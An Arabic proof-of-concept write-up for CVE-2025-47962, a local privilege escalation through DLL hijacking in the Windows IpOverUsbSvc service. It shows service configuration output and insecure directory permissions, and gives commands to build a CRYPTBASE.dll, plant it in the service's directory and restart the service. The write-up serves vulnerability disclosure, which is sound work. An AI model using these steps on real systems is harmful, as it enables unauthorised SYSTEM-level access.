
إثبات المفهوم لـ CVE-2025-47962 يوضح تصعيد الامتيازات المحلية عبر اختطاف DLL في خدمة Windows IpOverUsbSvc بسبب أذونات دليل غير آمنة.
عملية إعادة الإنتاج: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32
copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"
net stop IpOverUsbSvc
net start IpOverUsbSvc

الشرح: IpOverUsbSvc
sc.exe qc IpOverUsbSvc
SERVICE_NAME: IpOverUsbSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem
يعمل بصلاحيات LocalSystem. يقع الملف التنفيذي في الدليل C:\Microsoft Shared\، الذي يمتلك المستخدمون العاديون عليه صلاحيات تحكم كاملة.
تم اكتشاف أن المستخدمين العاديين يمكنهم كتابة ملفات إلى دليل خدمة SYSTEM.
ثم راقب ملف DLL

أذونات الدليل C:\Microsoft Shared\ الذي تم إنشاؤه أثناء تثبيت Windows SDK غير مكوّنة بشكل صحيح:
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)